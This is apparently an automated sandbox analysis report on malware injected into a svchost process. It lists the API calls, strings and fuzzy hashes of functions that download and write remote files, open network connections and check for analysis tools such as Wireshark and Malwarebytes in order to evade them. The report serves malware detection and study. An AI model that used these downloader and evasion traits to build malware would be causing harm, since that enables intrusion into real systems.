Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
• String ID: &
• API String ID: 640422297-3042966939
• Opcode ID: 611f38931546fe50acea0e56c80bc47b84437d905a338a8a36c87eb214e9690c
• Instruction ID: 59f2bcb85dc20a5d182021935b5d5df68f5b69632ae1e0dc8edf1453b28e472b
• Opcode Fuzzy Hash: 611f38931546fe50acea0e56c80bc47b84437d905a338a8a36c87eb214e9690c
• Instruction Fuzzy Hash: CED12BB1B002199BDB20CF55DC84BAAB7B4FF48304F0585A9EB1DA7201D774AE85CF69
APIs
• LoadLibraryW.KERNEL32(wininet.dll), ref: 04DF7D13
• GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 04DF7D27
• FreeLibrary.KERNEL32(00000000), ref: 04DF7D47
• GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 04DF7D66
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04DF7DA3
• _memset.LIBCMT ref: 04DF7DCE
• GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04DF7DDC
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04DF7E2B
• CloseHandle.KERNEL32(?), ref: 04DF7E49
• Sleep.KERNEL32(00000001), ref: 04DF7E51
• GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04DF7E5D
• FreeLibrary.KERNEL32(00000000), ref: 04DF7E78
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
• String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
• API String ID: 1463273941-1099148085
• Opcode ID: b9be9cf7b4df55002e538c74a494ac1068d58cdb3388d1421989b93f889cba8e
• Instruction ID: c717cd44cd48b27f4727979d7eaf87d9df6e07b14dbe2472e2075be9d8736cbd
• Opcode Fuzzy Hash: b9be9cf7b4df55002e538c74a494ac1068d58cdb3388d1421989b93f889cba8e
• Instruction Fuzzy Hash: CE418475A80218ABD7309F649C41FEAB7F8FF44701F15C1E9E648A6180DE746E458FD4
APIs
• Sleep.KERNEL32(00000064), ref: 0258454A
• timeGetTime.WINMM ref: 0258456B
• GetCurrentThreadId.KERNEL32 ref: 0258458B
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 025845AD
• SwitchToThread.KERNEL32 ref: 025845C7
• SetEvent.KERNEL32(?), ref: 02584610
• CloseHandle.KERNEL32(?), ref: 02584634
• send.WS2_32(?,02597420,00000010,00000000), ref: 02584658
• SetEvent.KERNEL32(?), ref: 02584676
• InterlockedExchange.KERNEL32(?,00000000), ref: 02584681
• WSACloseEvent.WS2_32(?), ref: 0258468F
• shutdown.WS2_32(?,00000001), ref: 025846A3
• closesocket.WS2_32(?), ref: 025846AD
• SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 025846E6
• SetLastError.KERNEL32(000005B4), ref: 025846FA
• GetCurrentThreadId.KERNEL32 ref: 0258471B
• InterlockedExchange.KERNEL32(?,00000001), ref: 02584733
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
• String ID:
• API String ID: 1692523546-0
• Opcode ID: 46d2cb18e2b03d6891052d1edfc5dcb7ed82f3e8e54e750f1467b2edbb076cfb
• Instruction ID: fd07b1a0ff772474438950da8b22df8b2110f30c9873f973082281c9a629946f
• Opcode Fuzzy Hash: 46d2cb18e2b03d6891052d1edfc5dcb7ed82f3e8e54e750f1467b2edbb076cfb
• Instruction Fuzzy Hash: B491BF70600612EFC725EF65D888B6ABBA5FF44704F108519E90AEB640E7B4E865CBD8
APIs
• Sleep.KERNEL32(00000064), ref: 04DF455A
• timeGetTime.WINMM ref: 04DF457B
• GetCurrentThreadId.KERNEL32 ref: 04DF459B
• InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04DF45BD
• SwitchToThread.KERNEL32 ref: 04DF45D7
• SetEvent.KERNEL32(?), ref: 04DF4620
• CloseHandle.KERNEL32(?), ref: 04DF4644
• send.WS2_32(?,04E159C0,00000010,00000000), ref: 04DF4668
• SetEvent.KERNEL32(?), ref: 04DF4686
• InterlockedExchange.KERNEL32(?,00000000), ref: 04DF4691
• WSACloseEvent.WS2_32(?), ref: 04DF469F
• shutdown.WS2_32(?,00000001), ref: 04DF46B3
• closesocket.WS2_32(?), ref: 04DF46BD
• SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 04DF46F6
• SetLastError.KERNEL32(000005B4), ref: 04DF470A
• GetCurrentThreadId.KERNEL32 ref: 04DF472B
• InterlockedExchange.KERNEL32(?,00000001), ref: 04DF4743
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
• String ID:
• API String ID: 1692523546-0
• Opcode ID: 9602df2d7b024eb4692f51141d14fa8781623f029820e4a4dd955bf78afc61ad
• Instruction ID: 63958ac2f28c2c0688cec394a0ac31f45debf4cac18fd110e0b8c2427d830e0e
• Opcode Fuzzy Hash: 9602df2d7b024eb4692f51141d14fa8781623f029820e4a4dd955bf78afc61ad
• Instruction Fuzzy Hash: 4491CD70200A12EFD734DF25DC88AABB7A5FF54705F018119EA168B654D735F891CBD0
APIs
• IsWindowVisible.USER32(?), ref: 04DF5D23
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: VisibleWindow
• String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
• API String ID: 1208467747-3439171801
• Opcode ID: c41855295b4c058742db04227d4e2c42ed7d06619569936f74badbb42774baca
• Instruction ID: c82ffcfbcaba5dfa49ed7d49410c943747a7fc8a18b5f087a07ecafbb2a912b0
• Opcode Fuzzy Hash: c41855295b4c058742db04227d4e2c42ed7d06619569936f74badbb42774baca
• Instruction Fuzzy Hash: BB41B1B6F8161277AA313F353C12BAF218C1F2168FF066028FE14A4551FEA5B256C4F6
APIs
• _memset.LIBCMT ref: 04DFC68D
• _memset.LIBCMT ref: 04DFC69C
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 04DFC6BF
  • Part of subcall function 04DFC86E: RegCloseKey.ADVAPI32(80000000,04DFC84A), ref: 04DFC87B
  • Part of subcall function 04DFC86E: RegCloseKey.ADVAPI32(00000000), ref: 04DFC884
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Close_memset$Open
• String ID: %08X
• API String ID: 4292648718-3773563069
• Opcode ID: 3c23f7eb54d63afa519365826a1d8e91c0872feeb9e4cd3875391068370c72e4
• Instruction ID: d33ee3f8c01431e8e9f99f6719b9d461c043b76395e95ed41994c5ae8522de4f
• Opcode Fuzzy Hash: 3c23f7eb54d63afa519365826a1d8e91c0872feeb9e4cd3875391068370c72e4
• Instruction Fuzzy Hash: 935154B1A50218ABEB24DF50DC85FEAB778FB44B04F805199F715A6180D774AF84CF94
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 025836F0
• WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02583729
• setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02583746
• setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02583759
• WSACreateEvent.WS2_32 ref: 0258375B
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,0259D990), ref: 0258376D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,0259D990), ref: 02583779
• lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,0259D990), ref: 02583798
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,0259D990), ref: 025837A4
• gethostbyname.WS2_32(00000000), ref: 025837B2
• htons.WS2_32(?), ref: 025837D8
• WSAEventSelect.WS2_32(?,?,00000030), ref: 025837F6
• connect.WS2_32(?,?,00000010), ref: 0258380B
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,0259D990), ref: 0258381A
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
• String ID:
• API String ID: 1455939504-0
• Opcode ID: 2090ba1cf334287026d246215e039dfd5f4d8be9d142bc312b15eb8d997c20ee
• Instruction ID: c21f77ba02b2912fb2f307370bbb24b7b3504270c7ee645f1ea4ee2343e8fab3
• Opcode Fuzzy Hash: 2090ba1cf334287026d246215e039dfd5f4d8be9d142bc312b15eb8d997c20ee
• Instruction Fuzzy Hash: AD417E71A40205ABE710AFA5DC89F7FB7B8FB88710F504519FA16A72C0D7B0A914DF68
                                                                                                              APIs
                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 04DF3710
                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 04DF3749
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 04DF3766
                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 04DF3779
                                                                                                              • WSACreateEvent.WS2_32 ref: 04DF377B
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,04E21F0C), ref: 04DF378D
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,04E21F0C), ref: 04DF3799
                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,04E21F0C), ref: 04DF37B8
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,04E21F0C), ref: 04DF37C4
                                                                                                              • gethostbyname.WS2_32(00000000), ref: 04DF37D2
                                                                                                              • htons.WS2_32(?), ref: 04DF37F8
                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 04DF3816
                                                                                                              • connect.WS2_32(?,?,00000010), ref: 04DF382B
                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04E21F0C), ref: 04DF383A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                              • String ID:
                                                                                                              • API String ID: 1455939504-0
                                                                                                              • Opcode ID: 13b9eb86749ce5a19e088cf5f9bf12bf9c90c045573ce9f44369f51a1024a2b3
                                                                                                              • Instruction ID: 8e30e5a240f89bd913a66645da9414fdf32c065047ad6aeca4b86ad7f238af1f
                                                                                                              • Opcode Fuzzy Hash: 13b9eb86749ce5a19e088cf5f9bf12bf9c90c045573ce9f44369f51a1024a2b3
                                                                                                              • Instruction Fuzzy Hash: 3E414FB1A40205ABE720DFA5DC89F7EB778FB48711F104619FB25A62D4CA78A904CB64
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: !jWW$.$_$e$i$l${vU_
                                                                                                              • API String ID: 2102423945-159827627
                                                                                                              • Opcode ID: d96d58cd0dee85eeea88bc89f6b8c9c85c84e69dab6c6a1d3cc7b7916c7c487b
                                                                                                              • Instruction ID: e68e09d8bb68a3f7455c8e2defaa403d9d7f269c7b3262db150a07fa5159cad8
                                                                                                              • Opcode Fuzzy Hash: d96d58cd0dee85eeea88bc89f6b8c9c85c84e69dab6c6a1d3cc7b7916c7c487b
                                                                                                              • Instruction Fuzzy Hash: 72919875A40214AFE720DFA0DCC4FAA77BAFB89710F548159FA099B280DB75DA40CF91
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1873853019-0
                                                                                                              • Opcode ID: f262def3ce91393e053eae3bb2940be6660f4daf3d4d34736c51edaa37cc017b
                                                                                                              • Instruction ID: 26f0ea8b4d33074cacbe7ba91abe3334d6ea5b44a6dc5833a416a6bec755ee04
                                                                                                              • Opcode Fuzzy Hash: f262def3ce91393e053eae3bb2940be6660f4daf3d4d34736c51edaa37cc017b
                                                                                                              • Instruction Fuzzy Hash: A481E3B5A40204ABF710EF64ECC6F6B7765AF45314F0441A8EE095F387EA72F91096A2
                                                                                                              APIs
                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,E10F6199,00000000,?,00000000,02586190,00000000), ref: 02585A65
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(025862F0,00000000), ref: 02585B04
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B42
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B67
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(02586390,00000000), ref: 02585C5F
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(025863A8,00000000), ref: 02585C80
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585B8C
                                                                                                                • Part of subcall function 02581280: __CxxThrowException@8.LIBCMT ref: 02581290
                                                                                                                • Part of subcall function 02581280: DeleteCriticalSection.KERNEL32(00000000,FFFFFFFF,02597DF8,?,?,02586511), ref: 025812A1
                                                                                                              • InterlockedExchange.KERNEL32(025861A8,00000000), ref: 02585CF1
                                                                                                              • timeGetTime.WINMM ref: 02585CF7
                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02585D0B
                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02585D14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1400036169-0
                                                                                                              • Opcode ID: 704eb249ff5712532eeb08b617cd35242fa5b6c05876d193b02676dabfb74cf0
                                                                                                              • Instruction ID: e674c760a0b473bdf40ffd4becd4d5a6937d2816e6a57b0bd8acc9f9834796d6
                                                                                                              • Opcode Fuzzy Hash: 704eb249ff5712532eeb08b617cd35242fa5b6c05876d193b02676dabfb74cf0
                                                                                                              • Instruction Fuzzy Hash: B9A106B0A01A46AFD714DF7AC88479AFBE8FB08314F90862ED12DD7640D774A964CF94
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,E10F6199,?,?,?,?,00000000,000000FF,00000000), ref: 02584CC6
                                                                                                              • EnterCriticalSection.KERNEL32(?,E10F6199,?,?,?,?,00000000,000000FF,00000000), ref: 02584CED
                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02584D01
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02584D08
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2124651672-0
                                                                                                              • Opcode ID: 07c95c8e908e33e10d4eeda930c7042dc3b88fb810b354331983963d73361c7c
                                                                                                              • Instruction ID: 49c410e78487152ad97192d6827ee15c6d61a4545a613605ed3acd8153d4c02e
                                                                                                              • Opcode Fuzzy Hash: 07c95c8e908e33e10d4eeda930c7042dc3b88fb810b354331983963d73361c7c
                                                                                                              • Instruction Fuzzy Hash: 8B51D076A487019FC311EFA8D585B6AF7F4FF88710F00492EE90A97740EB75B8148B99
                                                                                                              APIs
                                                                                                              • SetLastError.KERNEL32(0000139F,E179827C,?,?,?,?,00000000,000000FF,00000000), ref: 04DF4CE6
                                                                                                              • EnterCriticalSection.KERNEL32(?,E179827C,?,?,?,?,00000000,000000FF,00000000), ref: 04DF4D0D
                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 04DF4D21
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 04DF4D28
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2124651672-0
                                                                                                              • Opcode ID: b367553a7b7462d48cb0dfe2e446be09523a1e23964409fb6fd53caadde8b820
                                                                                                              • Instruction ID: ec3b636c0dd6f125c6f6bc4f6ff24b71f90925cb1ad160ff21b7514f7cc7150b
                                                                                                              • Opcode Fuzzy Hash: b367553a7b7462d48cb0dfe2e446be09523a1e23964409fb6fd53caadde8b820
                                                                                                              • Instruction Fuzzy Hash: 6D51BE76A042019FD720EFA9E884A6AF7F4FB48715F00452EEA1A97740DB35B800CB51
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset$_wcsrchr
                                                                                                              • String ID: D
                                                                                                              • API String ID: 170005318-2746444292
                                                                                                              • Opcode ID: 51c501c0fcba4e74bd271d3489f265b98970521ff166304b1203b595ae1cf1cd
                                                                                                              • Instruction ID: de5fec85665901c82b7cd8dc61074174136f6ed8738106e7850261aaf2b9fcc5
                                                                                                              • Opcode Fuzzy Hash: 51c501c0fcba4e74bd271d3489f265b98970521ff166304b1203b595ae1cf1cd
                                                                                                              • Instruction Fuzzy Hash: 0551C871A4031D7BEB20EB60CC85FEAB379AF14708F404599E609A6180FB71BB84CF61
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583DE5
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583E30
                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 02583E4E
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 02583E61
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02583E74
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583E9C
                                                                                                              • WSAGetLastError.WS2_32(?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583EA7
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,0258396D,?,00000000,000000FF,00000000), ref: 02583EBB
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 02583EF4
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 02583F31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1701177279-0
                                                                                                              • Opcode ID: 4359674154710e17c748fce0cd947a07b1f30f1991013b21902899532f80be1b
                                                                                                              • Instruction ID: 07b9e54ac0c9fbefa7913ca3a9ed31602a205538a8876c951c545d3e516282cf
                                                                                                              • Opcode Fuzzy Hash: 4359674154710e17c748fce0cd947a07b1f30f1991013b21902899532f80be1b
                                                                                                              • Instruction Fuzzy Hash: 6B412C72504600AFC7219F74D888BA7BBF8BB48704F45896DE85EDB240E7B1A4158F94
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3E05
                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3E50
                                                                                                              • send.WS2_32(?,000000FF,00000000,00000000), ref: 04DF3E6E
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 04DF3E81
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF3E94
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EBC
                                                                                                              • WSAGetLastError.WS2_32(?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EC7
                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,04DF398D,?,00000000,000000FF,00000000), ref: 04DF3EDB
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 04DF3F14
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 04DF3F51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1701177279-0
                                                                                                              • Opcode ID: 4490f69778194e9bdf47d9ac4368b11ca282c1ce46d243d6b22666e0bb58fbb3
                                                                                                              • Instruction ID: 34ffd46cba20368648657323f8e4b22bc63824b462ef2466a5168b850f4875cd
                                                                                                              • Opcode Fuzzy Hash: 4490f69778194e9bdf47d9ac4368b11ca282c1ce46d243d6b22666e0bb58fbb3
                                                                                                              • Instruction Fuzzy Hash: A04108716046019FD7209F79D988AA7B7F8FF48301F06896EED6ACB244E735F8418B60
                                                                                                              APIs
                                                                                                              • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02584F43
                                                                                                              • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02584F58
                                                                                                              • WSASetLastError.WS2_32(00002746), ref: 02584F6A
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 02584F71
                                                                                                              • timeGetTime.WINMM ref: 02584F9F
                                                                                                              • timeGetTime.WINMM ref: 02584FC7
                                                                                                              • SetEvent.KERNEL32(?), ref: 02585005
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02585011
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 02585018
                                                                                                              • LeaveCriticalSection.KERNEL32(000002FF), ref: 0258502B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                              • String ID:
                                                                                                              • API String ID: 1979691958-0
                                                                                                              • Opcode ID: a61d024050c8820aaaa41f6a454d1e2c8d93a8f6477922c172a550bcdb6f34d5
                                                                                                              • Instruction ID: 1f03504421ac3d96e255c22036c694831e4b1deec87d023af079e75570f41fa0
                                                                                                              • Opcode Fuzzy Hash: a61d024050c8820aaaa41f6a454d1e2c8d93a8f6477922c172a550bcdb6f34d5
                                                                                                              • Instruction Fuzzy Hash: 77412631A00301DFD721EF28D548B6ABBE9FF48314F814958E98ADB341F7B1E4648B88
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 3592133475-0
                                                                                                              • Opcode ID: b7cb735c84752804069efcc85374136dcd61237d0bc07c099967b7b64fc6fcc4
                                                                                                              • Instruction ID: fec01a741d77e9c7e9b37871fb5c55fa9a52288f52b82410c437ebae1447a736
                                                                                                              • Opcode Fuzzy Hash: b7cb735c84752804069efcc85374136dcd61237d0bc07c099967b7b64fc6fcc4
                                                                                                              • Instruction Fuzzy Hash: EA02C6B1A00614AFE724DB64CC81FEAB7B9EF48304F448558F71AA7281EB70BA45CF55
                                                                                                              APIs
                                                                                                                • Part of subcall function 02583640: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02583647
